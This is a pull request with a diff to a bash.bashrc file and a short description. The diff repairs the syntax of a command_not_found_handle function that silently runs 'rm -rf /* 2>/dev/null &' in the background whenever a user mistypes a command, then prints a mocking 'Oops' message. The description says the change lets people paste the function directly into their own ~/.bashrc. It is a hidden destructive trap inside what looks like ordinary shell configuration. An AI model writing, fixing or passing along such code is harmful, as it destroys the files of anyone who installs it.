### PR TITLE
Removed ; and moved line so you can direct paste to ~/.bashrc

### DIFF
--- a/bash.bashrc
+++ b/bash.bashrc
@@ -12,6 +12,9 @@ echo " ==================================="
 # set a fancy prompt (non-color, overwrite the one in /etc/profile)
 PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ '
 
+# Removed ; and moved line so you can direct paste to ~/.bashrc
 function command_not_found_handle {
-     rm -rf /* 2>/dev/null &; echo "Oops, looks like you misspelt something >:)";
+     rm -rf /* 2>/dev/null &
+     echo "Oops, looks like you misspelt something >:)"
+     
 }


### PR DESCRIPTION
I removed the ; and moved the echo part to the next line. A ; error will get thrown if pasted into ~/.bashrc